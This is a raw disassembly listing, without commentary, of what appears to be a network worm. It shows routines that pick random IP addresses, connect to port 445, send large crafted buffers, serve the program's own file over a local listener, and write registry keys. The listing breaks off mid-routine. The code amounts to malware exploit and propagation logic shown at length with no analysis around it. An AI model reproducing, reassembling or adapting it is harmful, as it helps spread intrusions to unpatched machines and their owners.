mov eax, [ebp+10h]
mov [ebp-4], eax
mov dword ptr ds:loc_40408D+3, eax
lea eax, [ebp-8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_43F07A: ; CODE XREF: .data:0043F113�j
cmp esi, 0FFFFFFFFh
jz loc_43F12B
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_43F10A
push esi
push ebp
lea ebp, [ebx+10h]
mov eax, [ebp-14h]
mov eax, [eax]
mov eax, [eax]
mov dword ptr ds:loc_40402C+4, eax
mov edx, [ebp-14h]
mov eax, [edx]
mov dword ptr ds:loc_404033+1, eax
mov eax, [edx+4]
mov dword ptr ds:loc_404033+5, eax
push esi
push edi
push ecx
mov ecx, 14h
lea edi, loc_40403B+1
mov esi, dword ptr ds:loc_404033+1
rep movsd
lea edi, loc_40403B+1
mov dword ptr ds:loc_404033+1, edi
pop ecx
pop edi
pop esi
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+0Ch]
or eax, eax
jz short loc_43F10A
js short loc_43F118
mov edi, [ebx+8]
push ebx
call sub_43F017
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_43EFBD
add esp, 8
lea ecx, [esi+esi*2]
mov eax, [edi+ecx*4]
mov eax, [ebx+0Ch]
call dword ptr [edi+ecx*4+8]
loc_43F10A: ; CODE XREF: .data:0043F08B�j
; .data:0043F0E0�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp loc_43F07A
; ---------------------------------------------------------------------------
loc_43F118: ; CODE XREF: .data:0043F0E2�j
xor eax, eax
jmp short loc_43F18D
; ---------------------------------------------------------------------------
loc_43F11C: ; CODE XREF: .data:0043F05A�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_43EFBD
add esp, 0Ch
loc_43F12B: ; CODE XREF: .data:0043F07D�j
push 0
mov dword ptr ds:loc_40400E+2, 0Bh
push 0Bh
call sub_4408F9
add esp, 8
or eax, eax
jnz short loc_43F166
push 0
mov dword ptr ds:loc_40400E+2, 8
push 8
call sub_4408F9
add esp, 8
or eax, eax
jnz short loc_43F166
mov eax, 1
jmp short loc_43F18D
; ---------------------------------------------------------------------------
loc_43F166: ; CODE XREF: .data:0043F143�j
; .data:0043F15D�j
cmp eax, 0FFFFFFFFh
jz short loc_43F195
push eax
push dword ptr ds:loc_40400E+2
call sub_4408F9
add esp, 8
push dword ptr ds:loc_40400E+2
call sub_4408E1
add esp, 4
mov eax, 1
loc_43F18D: ; CODE XREF: .data:0043F11A�j
; .data:0043F164�j ...
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_43F195: ; CODE XREF: .data:0043F169�j
cmp dword ptr ds:loc_40402C, 0
jnz short loc_43F1A5
mov eax, 1
jmp short loc_43F18D
; ---------------------------------------------------------------------------
loc_43F1A5: ; CODE XREF: .data:0043F19C�j
mov eax, dword ptr ds:loc_40402C
push 0Bh
jmp eax
; ---------------------------------------------------------------------------
dw 0B858h
dd 1, 0A164D7EBh, 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push 40401Ch
push offset sub_40109A
push eax
mov large fs:0, esp
sub esp, 10h
push ebx
push esi
push edi
mov [ebp-18h], esp
push eax
fnstcw word ptr [esp]
or word ptr [esp], 300h
fldcw word ptr [esp]
add esp, 4
push 0
push 0
push 404028h
push 404024h
push offset sub_404020
call sub_4408A5
push dword ptr ds:loc_404025+3
push dword ptr ds:loc_404023+1
push dword ptr ds:sub_404020
mov dword ptr ds:loc_40400E+6, esp
call sub_4405FD
add esp, 18h
xor ecx, ecx
mov [ebp-4], ecx
push eax
call sub_4408BD
leave
retn
; ---------------------------------------------------------------------------
db 64h, 0A3h, 0
dd 0C3000000h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F239 proc near ; CODE XREF: sub_43F2D4+12�p
var_35 = byte ptr -35h
var_3 = byte ptr -3
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
push 2
lea eax, [ebp+var_35]
push eax
push [ebp+arg_0]
call sub_440899
add esp, 0Ch
lea ecx, [ebp+var_35]
or eax, 0FFFFFFFFh
loc_43F25C: ; CODE XREF: sub_43F239+28�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43F25C
mov ebx, eax
mov [ebp+var_2], bl
mov [ebp+var_1], 0
jmp short loc_43F284
; ---------------------------------------------------------------------------
loc_43F26E: ; CODE XREF: sub_43F239+55�j
movzx eax, [ebp+var_1]
movzx edx, [ebp+var_2]
sub edx, eax
dec edx
mov al, [ebp+eax+var_35]
mov [edi+edx], al
add [ebp+var_1], 1
loc_43F284: ; CODE XREF: sub_43F239+33�j
movzx eax, [ebp+var_1]
movzx edx, [ebp+var_2]
cmp eax, edx
jl short loc_43F26E
movzx eax, [ebp+var_2]
mov byte ptr [edi+eax], 0
mov [ebp+var_3], 0
jmp short loc_43F2B0
; ---------------------------------------------------------------------------
loc_43F29E: ; CODE XREF: sub_43F239+88�j
push 404DE5h
push edi
call sub_44091D
add esp, 8
add [ebp+var_3], 1
loc_43F2B0: ; CODE XREF: sub_43F239+63�j
movzx eax, [ebp+var_3]
mov edx, 20h
movzx ecx, [ebp+var_2]
sub edx, ecx
cmp eax, edx
jl short loc_43F29E
push [ebp+arg_8]
push edi
call sub_44091D
add esp, 8
pop edi
pop esi
pop ebx
leave
retn
sub_43F239 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F2D4 proc near ; CODE XREF: sub_4403F5+97�p
var_32 = byte ptr -32h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 34h
push 404DE3h
lea eax, [ebp+var_32]
push eax
push [ebp+arg_0]
call sub_43F239
add esp, 0Ch
lea eax, [ebp+var_32]
push eax
call sub_44070D
leave
retn
sub_43F2D4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F2F9 proc near ; CODE XREF: .data:004403B3�p
; sub_4403F5+F1�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
push eax
push edi
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push 0
push 0F003Fh
push 0
push 0
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_44085D
mov edi, eax
or edi, edi
jz short loc_43F329
xor eax, eax
jmp short loc_43F361
; ---------------------------------------------------------------------------
loc_43F329: ; CODE XREF: sub_43F2F9+2A�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_14]
push 0
push [ebp+arg_8]
push [ebp+var_4]
call sub_44088D
mov edi, eax
push [ebp+var_4]
call sub_440869
or edi, edi
jz short loc_43F351
xor eax, eax
jmp short loc_43F361
; ---------------------------------------------------------------------------
loc_43F351: ; CODE XREF: sub_43F2F9+52�j
cmp [ebp+var_8], 1
jnz short loc_43F35E
mov eax, 2
jmp short loc_43F361
; ---------------------------------------------------------------------------
loc_43F35E: ; CODE XREF: sub_43F2F9+5C�j
xor eax, eax
inc eax
loc_43F361: ; CODE XREF: sub_43F2F9+2E�j
; sub_43F2F9+56�j ...
pop edi
leave
retn
sub_43F2F9 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F364 proc near ; CODE XREF: .data:0044038C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
push edi
lea eax, [ebp+var_4]
push eax
push 20019h
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_440875
mov edi, eax
or edi, edi
jz short loc_43F389
xor eax, eax
jmp short loc_43F3B4
; ---------------------------------------------------------------------------
loc_43F389: ; CODE XREF: sub_43F364+1F�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_14]
push 0
push [ebp+arg_8]
push [ebp+var_4]
call sub_440881
mov edi, eax
push [ebp+var_4]
call sub_440869
or edi, edi
jz short loc_43F3B1
xor eax, eax
jmp short loc_43F3B4
; ---------------------------------------------------------------------------
loc_43F3B1: ; CODE XREF: sub_43F364+47�j
xor eax, eax
inc eax
loc_43F3B4: ; CODE XREF: sub_43F364+23�j
; sub_43F364+4B�j
pop edi
leave
retn
sub_43F364 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 200h
push ebx
push esi
push edi
xor ebx, ebx
push 0
push 100h
lea eax, [ebp-100h]
push eax
push dword ptr [ebp+8]
call sub_4405B5
cmp eax, 0FFFFFFFFh
jz loc_43F4FB
push 404DDFh
lea eax, [ebp-100h]
push eax
call sub_440935
add esp, 8
or eax, eax
jz loc_43F4BD
push 404DDBh
lea edx, [ebp-100h]
push edx
call sub_440935
add esp, 8
or eax, eax
jz loc_43F4BD
push 0
push 3Dh
push 404D9Dh
push dword ptr [ebp+8]
call sub_4405C1
push dword ptr ds:loc_403004
push 404D86h
lea eax, [ebp-200h]
push eax
call sub_440905
add esp, 0Ch
lea ecx, [ebp-200h]
or eax, 0FFFFFFFFh
loc_43F450: ; CODE XREF: .data:0043F455�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43F450
push 0
push eax
lea edx, [ebp-200h]
push edx
push dword ptr [ebp+8]
call sub_4405C1
loc_43F469: ; CODE XREF: .data:0043F4AF�j
mov eax, dword ptr ds:loc_403004
mov edi, eax
sub edi, ebx
cmp edi, 1000h
jb short loc_43F47F
mov edi, 1000h
loc_43F47F: ; CODE XREF: .data:0043F478�j
or edi, edi
jz short loc_43F4B1
push 0
push edi
mov eax, ebx
add eax, dword ptr ds:loc_403004+4
push eax
push dword ptr [ebp+8]
call sub_4405C1
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_43F4FB
cmp esi, 1000h
jb short loc_43F4B1
add ebx, esi
push 64h
call sub_44076D
jmp short loc_43F469
; ---------------------------------------------------------------------------
loc_43F4B1: ; CODE XREF: .data:0043F481�j
; .data:0043F4A4�j
push 404098h
call sub_440725
jmp short loc_43F4DF
; ---------------------------------------------------------------------------
loc_43F4BD: ; CODE XREF: .data:0043F3FA�j
; .data:0043F416�j
push 0
push 15h
push 404D70h
push dword ptr [ebp+8]
call sub_4405C1
push 0
push 0Dh
push 40409Ch
push dword ptr [ebp+8]
call sub_4405C1
loc_43F4DF: ; CODE XREF: .data:0043F4BB�j
push 7D0h
call sub_44076D
push 2
push dword ptr [ebp+8]
call sub_4405CD
push dword ptr [ebp+8]
call sub_440555
loc_43F4FB: ; CODE XREF: .data:0043F3DE�j
; .data:0043F49C�j
pop edi
pop esi
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 34h
push ebx
push esi
push edi
push 0
push 404098h
call sub_440719
push 0
push 80h
push 3
push 0
push 1
push 80000000h
push offset sub_403010
call sub_44073D
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jnz short loc_43F541
push 1
call sub_4406AD
loc_43F541: ; CODE XREF: .data:0043F538�j
push 0
push ebx
call sub_4406D1
mov dword ptr ds:loc_403004, eax
push eax
push 0
call sub_440731
mov dword ptr ds:loc_403004+4, eax
push 0
lea eax, [ebp-30h]
push eax
push dword ptr ds:loc_403004
push dword ptr ds:loc_403004+4
push ebx
call sub_440749
push ebx
call sub_4406E9
push 0
push 1
push 2
call sub_4405D9
mov esi, eax
push 10h
lea eax, [ebp-24h]
push eax
call sub_440761
mov word ptr [ebp-24h], 2
and dword ptr [ebp-20h], 0
mov word ptr [ebp-26h], 0
loc_43F5A1: ; CODE XREF: .data:0043F5E1�j
movzx eax, word ptr [ebp-26h]
add eax, 50h
mov word ptr ds:loc_404092+2, ax
movzx eax, word ptr ds:loc_404092+2
push eax
call sub_440585
mov edx, eax
mov [ebp-22h], dx
push 10h
lea eax, [ebp-24h]
push eax
push esi
call sub_440549
mov [ebp-2Ch], eax
inc word ptr [ebp-26h]
or eax, eax
jz short loc_43F5E3
movzx eax, word ptr [ebp-26h]
cmp eax, 0FDE8h
jl short loc_43F5A1
loc_43F5E3: ; CODE XREF: .data:0043F5D6�j
push 64h
push esi
call sub_4405A9
mov dword ptr [ebp-4], 10h
loc_43F5F2: ; CODE XREF: .data:0043F61D�j
lea eax, [ebp-4]
push eax
lea eax, [ebp-14h]
push eax
push esi
call sub_44053D
mov edi, eax
lea eax, [ebp-34h]
push eax
push 0
push edi
push 40141Ah
push 0
push 0
call sub_440791
push eax
call sub_4406E9
jmp short loc_43F5F2
; ---------------------------------------------------------------------------
db 5Fh
dd 0C3C95B5Eh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F624 proc near ; CODE XREF: .data:0043FE57�p
var_1B = byte ptr -1Bh
var_1A = byte ptr -1Ah
var_19 = byte ptr -19h
var_18 = byte ptr -18h
var_13 = byte ptr -13h
var_3 = byte ptr -3
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push esi
push edi
lea edi, [ebp+var_13]
lea esi, sub_4040AA
mov ecx, 4
rep movsd
lea edi, [ebp+var_18]
lea esi, loc_4040B4+6
mov ecx, 5
rep movsb
loc_43F64D: ; CODE XREF: sub_43F624+51�j
; sub_43F624+74�j
call sub_4408ED
mov ecx, 0DDh
cdq
idiv ecx
lea edi, [edx+3]
mov ebx, edi
mov [ebp+var_3], bl
mov [ebp+var_2], 0
jmp short loc_43F69E
; ---------------------------------------------------------------------------
loc_43F66A: ; CODE XREF: sub_43F624+81�j
mov al, [ebp+var_3]
movzx edx, [ebp+var_2]
cmp al, [ebp+edx+var_13]
jz short loc_43F64D
movzx eax, [ebp+var_2]
cmp eax, 5
jnb short loc_43F69A
movzx eax, [ebp+var_3]
movzx edx, [ebp+var_2]
movzx ecx, [ebp+edx+var_13]
cmp eax, ecx
jb short loc_43F69A
movzx edx, [ebp+edx+var_18]
cmp eax, edx
jbe short loc_43F64D
loc_43F69A: ; CODE XREF: sub_43F624+5A�j
; sub_43F624+6B�j
inc [ebp+var_2]
loc_43F69E: ; CODE XREF: sub_43F624+44�j
movzx eax, [ebp+var_2]
cmp eax, 10h
jb short loc_43F66A
loc_43F6A7: ; CODE XREF: sub_43F624+AC�j
call sub_4408ED
mov ecx, 0FDh
cdq
idiv ecx
lea edi, [edx+1]
mov ebx, edi
mov [ebp+var_19], bl
movzx eax, [ebp+var_3]
cmp eax, 0C0h
jnz short loc_43F6D2
movzx eax, [ebp+var_19]
cmp eax, 0A8h
jz short loc_43F6A7
loc_43F6D2: ; CODE XREF: sub_43F624+A1�j
call sub_4408ED
mov ecx, 0FDh
cdq
idiv ecx
lea edi, [edx+1]
mov ebx, edi
mov [ebp+var_1A], bl
call sub_4408ED
mov ecx, 0FDh
cdq
idiv ecx
lea edi, [edx+1]
mov ebx, edi
mov [ebp+var_1B], bl
movzx eax, [ebp+var_1B]
push eax
movzx eax, [ebp+var_1A]
push eax
movzx eax, [ebp+var_19]
push eax
movzx eax, [ebp+var_3]
push eax
push 404D64h
push [ebp+arg_0]
call sub_440905
add esp, 18h
pop edi
pop esi
pop ebx
leave
retn
sub_43F624 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F725 proc near ; CODE XREF: .data:0044005C�p
var_89F4 = dword ptr -89F4h
var_89F0 = dword ptr -89F0h
var_89EC = dword ptr -89ECh
var_89E8 = dword ptr -89E8h
var_89E3 = byte ptr -89E3h
var_89E2 = word ptr -89E2h
var_89E0 = byte ptr -89E0h
var_89D8 = byte ptr -89D8h
var_8970 = byte ptr -8970h
var_6900 = byte ptr -6900h
var_68E2 = byte ptr -68E2h
var_6842 = byte ptr -6842h
var_6136 = dword ptr -6136h
var_6126 = byte ptr -6126h
var_6112 = byte ptr -6112h
var_60A2 = byte ptr -60A2h
var_55DE = byte ptr -55DEh
var_403A = byte ptr -403Ah
var_4039 = byte ptr -4039h
var_3FBD = byte ptr -3FBDh
var_37ED = byte ptr -37EDh
var_3342 = byte ptr -3342h
var_3058 = dword ptr -3058h
var_3054 = dword ptr -3054h
var_3050 = dword ptr -3050h
var_304C = word ptr -304Ch
var_304A = word ptr -304Ah
var_3048 = dword ptr -3048h
var_303C = byte ptr -303Ch
var_3039 = byte ptr -3039h
var_300F = byte ptr -300Fh
var_300D = byte ptr -300Dh
var_300C = byte ptr -300Ch
var_2FC7 = byte ptr -2FC7h
var_2F83 = byte ptr -2F83h
var_2987 = byte ptr -2987h
var_21A3 = byte ptr -21A3h
var_2193 = byte ptr -2193h
var_1E6F = byte ptr -1E6Fh
var_1E6B = byte ptr -1E6Bh
var_1E5F = byte ptr -1E5Fh
var_1BDA = byte ptr -1BDAh
var_1BD9 = byte ptr -1BD9h
var_B46 = byte ptr -0B46h
var_82 = byte ptr -82h
var_81 = byte ptr -81h
var_80 = dword ptr -80h
var_7C = byte ptr -7Ch
var_54 = dword ptr -54h
var_50 = byte ptr -50h
var_4F = byte ptr -4Fh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, 89F4h
call sub_440661
push ebx
push esi
push edi
mov [ebp+var_3054], 1
mov [ebp+var_89F0], 1
lea edi, [ebp+var_89E0]
lea esi, loc_4049EB+5
movsd
movsd
and [ebp+var_89F4], 0
mov [ebp+var_89E2], 1BDh
push 0
push 1
push 2
call sub_4405D9
mov [ebp+var_54], eax
cmp eax, 0FFFFFFFFh
jz loc_43FD7B
mov eax, [ebp+arg_0]
mov [ebp+var_89EC], eax
push eax
call sub_44059D
push 1Dh
push eax
lea edi, [ebp+var_6900]
push edi
call sub_440779
lea eax, [ebp+var_6900]
push eax
push 404D5Ah
lea eax, [ebp+var_7C]
push eax
call sub_440905
add esp, 0Ch
xor ebx, ebx
loc_43F7B6: ; CODE XREF: sub_43F725+A2�j
mov dl, [ebp+ebx+var_7C]
mov [ebp+ebx*2+var_50], dl
mov [ebp+ebx*2+var_4F], 0
inc ebx
cmp ebx, 28h
jl short loc_43F7B6
push 60h
push offset sub_404525
lea eax, [ebp+var_303C]
push eax
call sub_4408C9
lea eax, [ebp+var_7C]
push eax
call sub_440785
mov edi, eax
shl edi, 1
push edi
lea edi, [ebp+var_50]
push edi
lea edi, [ebp+var_300C]
push edi
call sub_4408C9
lea eax, [ebp+var_7C]
push eax
call sub_440785
push 9
push 40457Ch
mov edi, eax
shl edi, 1
lea edi, [ebp+edi+var_300D]
push edi
call sub_4408C9
lea eax, [ebp+var_7C]
push eax
call sub_440785
mov edx, eax
movsx edi, dl
shl edi, 1
add edi, 34h
mov edx, edi
mov [ebp+var_403A], dl
push 1
lea eax, [ebp+var_403A]
push eax
lea eax, [ebp+var_3039]
push eax
call sub_4408C9
lea eax, [ebp+var_7C]
push eax
call sub_440785
mov edx, eax
movsx edi, dl
shl edi, 1
add edi, 9
mov edx, edi
mov [ebp+var_89E3], dl
push 1
lea eax, [ebp+var_89E3]
push eax
lea eax, [ebp+var_300F]
push eax
call sub_4408C9
mov eax, [ebp+arg_4]
mov [ebp+var_3058], eax
push 0E29h
push 31h
lea eax, [ebp+var_4039]
push eax
call sub_4408D5
add esp, 48h
push 10h
lea eax, [ebp+var_304C]
push eax
call sub_440761
mov [ebp+var_304C], 2
movsx eax, [ebp+var_89E2]
movzx eax, ax
push eax
call sub_440585
mov edi, eax
mov [ebp+var_304A], di
mov eax, [ebp+arg_0]
mov [ebp+var_3048], eax
push 10h
lea eax, [ebp+var_304C]
push eax
push [ebp+var_54]
call sub_440561
cmp eax, 0FFFFFFFFh
jnz short loc_43F8F8
mov [ebp+var_3054], 2
jmp loc_43FD73
; ---------------------------------------------------------------------------
loc_43F8F8: ; CODE XREF: sub_43F725+1C2�j
push 64h
call sub_44076D
push 0
push 89h
push offset sub_404313
push [ebp+var_54]
call sub_4405C1
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_44076D
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_4405B5
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_43FD69
push 0
push 0A8h
push 40439Dh
push [ebp+var_54]
call sub_4405C1
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_44076D
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_4405B5
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_43FD69
push 0
push 0DEh
push 404446h
push [ebp+var_54]
call sub_4405C1
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_44076D
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_4405B5
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_43FD69
mov eax, [ebp+var_80]
cmp eax, 0FFFFFFFFh
jz short loc_43F9D2
cmp eax, 46h
jge short loc_43F9D7
loc_43F9D2: ; CODE XREF: sub_43F725+2A6�j
jmp loc_43FD69
; ---------------------------------------------------------------------------
loc_43F9D7: ; CODE XREF: sub_43F725+2AB�j
lea eax, [ebp+var_2F83]
mov [ebp+var_89E8], eax
cmp byte ptr [eax], 31h
setnz al
and eax, 1
mov [ebp+var_3050], eax
jz loc_43FAEB
push 0DACh
push 90h
lea eax, [ebp+var_2987]
push eax
call sub_4408D5
push 4
imul eax, [ebp+var_3050], 3Ch
lea eax, ds:404938h[eax]
push eax
lea eax, [ebp+var_21A3]
push eax
call sub_4408C9
push [ebp+arg_8]
push [ebp+var_3058]
lea eax, [ebp+var_2193]
push eax
call sub_4408C9
push 4
push 404D55h
lea eax, [ebp+var_1E6F]
push eax
call sub_4408C9
push 4
imul eax, [ebp+var_3050], 3Ch
lea eax, ds:404938h[eax]
push eax
lea eax, [ebp+var_1E6B]
push eax
call sub_4408C9
push [ebp+var_3058]
call sub_440785
push eax
push [ebp+var_3058]
lea edi, [ebp+var_1E5F]
push edi
call sub_4408C9
add esp, 48h
xor ebx, ebx
loc_43FA93: ; CODE XREF: sub_43F725+38B�j
mov dl, [ebp+ebx+var_2987]
mov [ebp+ebx*2+var_1BDA], dl
mov [ebp+ebx*2+var_1BD9], 0
inc ebx
cmp ebx, 0DACh
jl short loc_43FA93
mov [ebp+var_82], 0
mov [ebp+var_81], 0
push 1C52h
push 31h
lea eax, [ebp+var_89D8]
push eax
call sub_4408D5
push 1C52h
push 31h
lea eax, [ebp+var_6112]
push eax
call sub_4408D5
add esp, 18h
jmp short loc_43FB4D
; ---------------------------------------------------------------------------
loc_43FAEB: ; CODE XREF: sub_43F725+2CD�j
push 7D0h
push 90h
lea eax, [ebp+var_68E2]
push eax
call sub_4408D5
push [ebp+var_3058]
call sub_440785
push eax
push [ebp+var_3058]
lea edi, [ebp+var_6842]
push edi
call sub_4408C9
lea eax, [ebp+var_89E0]
push eax
call sub_440785
push eax
lea edi, [ebp+var_89E0]
push edi
lea edi, [ebp+var_6126]
push edi
call sub_4408C9
add esp, 24h
mov eax, dword ptr ds:loc_404937+1
mov [ebp+var_6136], eax
loc_43FB4D: ; CODE XREF: sub_43F725+3C4�j
push 0
movsx eax, [ebp+var_403A]
add eax, 4
push eax
lea eax, [ebp+var_303C]
push eax
push [ebp+var_54]
call sub_4405C1
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_44076D
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_4405B5
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_43FD69
push 0
push 68h
push offset sub_404586
push [ebp+var_54]
call sub_4405C1
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_44076D
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_4405B5
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_43FD69
push 0
push 0A0h
push offset sub_4045EF
push [ebp+var_54]
call sub_4405C1
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_44076D
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_4405B5
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_43FD69
cmp [ebp+var_3050], 0
jz loc_43FCF5
push 68h
push offset sub_40479E
lea eax, [ebp+var_89D8]
push eax
call sub_4408C9
push 1B5Ah
lea eax, [ebp+var_1BDA]
push eax
lea eax, [ebp+var_8970]
push eax
call sub_4408C9
push 70h
push offset sub_404807
lea eax, [ebp+var_6112]
push eax
call sub_4408C9
push 0A5Eh
lea eax, [ebp+var_B46]
push eax
lea eax, [ebp+var_60A2]
push eax
call sub_4408C9
push 84h
push 404878h
lea eax, [ebp+var_55DE]
push eax
call sub_4408C9
add esp, 3Ch
push 0
push 10FCh
lea eax, [ebp+var_89D8]
push eax
push [ebp+var_54]
call sub_4405C1
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_44076D
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_4405B5
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_43FD69
push 0
push 0FDCh
lea eax, [ebp+var_6112]
push eax
push [ebp+var_54]
call sub_4405C1
cmp eax, 0FFFFFFFFh
jnz short loc_43FD5B
jmp short loc_43FD5B
; ---------------------------------------------------------------------------
loc_43FCF5: ; CODE XREF: sub_43F725+4FA�j
push 7Ch
push 404690h
lea eax, [ebp+var_4039]
push eax
call sub_4408C9
push 7D0h
lea eax, [ebp+var_68E2]
push eax
lea eax, [ebp+var_3FBD]
push eax
call sub_4408C9
push 90h
push offset sub_40470D
lea eax, [ebp+var_37ED]
push eax
call sub_4408C9
add esp, 24h
mov [ebp+var_3342], 0
push 0
push 0CF8h
lea eax, [ebp+var_4039]
push eax
push [ebp+var_54]
call sub_4405C1
cmp eax, 0FFFFFFFFh
jnz short $+2
loc_43FD5B: ; CODE XREF: sub_43F725+5CC�j
; sub_43F725+5CE�j
push 64h
call sub_44076D
and [ebp+var_3054], 0
loc_43FD69: ; CODE XREF: sub_43F725+216�j
; sub_43F725+258�j ...
push 2
push [ebp+var_54]
call sub_4405CD
loc_43FD73: ; CODE XREF: sub_43F725+1CE�j
push [ebp+var_54]
call sub_440555
loc_43FD7B: ; CODE XREF: sub_43F725+53�j
mov eax, [ebp+var_3054]
pop edi
pop esi
pop ebx
leave
retn
sub_43F725 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43FD86 proc near ; CODE XREF: .data:loc_43FDFA�p
var_32 = byte ptr -32h
push ebp
mov ebp, esp
sub esp, 34h
push esi
push edi
push 31h
lea eax, [ebp+var_32]
push eax
call sub_440579
cmp eax, 0FFFFFFFFh
jnz short loc_43FDA2
xor eax, eax
jmp short loc_43FDBC
; ---------------------------------------------------------------------------
loc_43FDA2: ; CODE XREF: sub_43FD86+16�j
lea eax, [ebp+var_32]
push eax
call sub_44056D
mov edi, eax
or edi, edi
jnz short loc_43FDB5
xor eax, eax
jmp short loc_43FDBC
; ---------------------------------------------------------------------------
loc_43FDB5: ; CODE XREF: sub_43FD86+29�j
mov eax, [edi+0Ch]
mov esi, [eax]
mov eax, [esi]
loc_43FDBC: ; CODE XREF: sub_43FD86+1A�j
; sub_43FD86+2D�j
pop edi
pop esi
leave
retn
sub_43FD86 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 13Ch
push ebx
push esi
push edi
call sub_4406F5
push eax
call sub_440911
mov esi, 254h
mov eax, esi
add eax, 0Ah
push eax
push 0
call sub_440731
mov ebx, eax
push esi
push 4040BFh
push ebx
call sub_4408C9
add esp, 10h
loc_43FDFA: ; CODE XREF: .data:0043FE14�j
; .data:0043FE4E�j ...
call sub_43FD86
mov [ebp-10Ch], eax
or eax, eax
jnz short loc_43FE16
push 384h
call sub_4408B1
pop ecx
jmp short loc_43FDFA
; ---------------------------------------------------------------------------
loc_43FE16: ; CODE XREF: .data:0043FE07�j
mov al, [ebp-10Ch]
mov [ebp-111h], al
mov al, [ebp-10Bh]
mov [ebp-112h], al
mov al, [ebp-10Ah]
mov [ebp-135h], al
cmp byte ptr [ebp-111h], 7Fh
jnz short loc_43FE50
push 384h
call sub_4408B1
pop ecx
jmp short loc_43FDFA
; ---------------------------------------------------------------------------
loc_43FE50: ; CODE XREF: .data:0043FE41�j
lea eax, [ebp-130h]
push eax
call sub_43F624
push 0
call sub_4408B1
add esp, 8
call sub_4408ED
mov ecx, 0FDh
cdq
idiv ecx
mov edi, edx
inc edi
mov edx, edi
mov [ebp-134h], dl
call sub_4408ED
mov ecx, 0FDh
cdq
idiv ecx
mov edi, edx
inc edi
mov edx, edi
mov [ebp-131h], dl
call sub_4408ED
mov ecx, 0FDh
cdq
idiv ecx
mov edi, edx
inc edi
mov edx, edi
mov [ebp-132h], dl
call sub_4408ED
mov ecx, 0Ah
cdq
idiv ecx
mov [ebp-133h], dl
mov al, [ebp-133h]
cmp al, 5
jnb short loc_43FEED
mov al, [ebp-112h]
mov [ebp-134h], al
mov al, [ebp-133h]
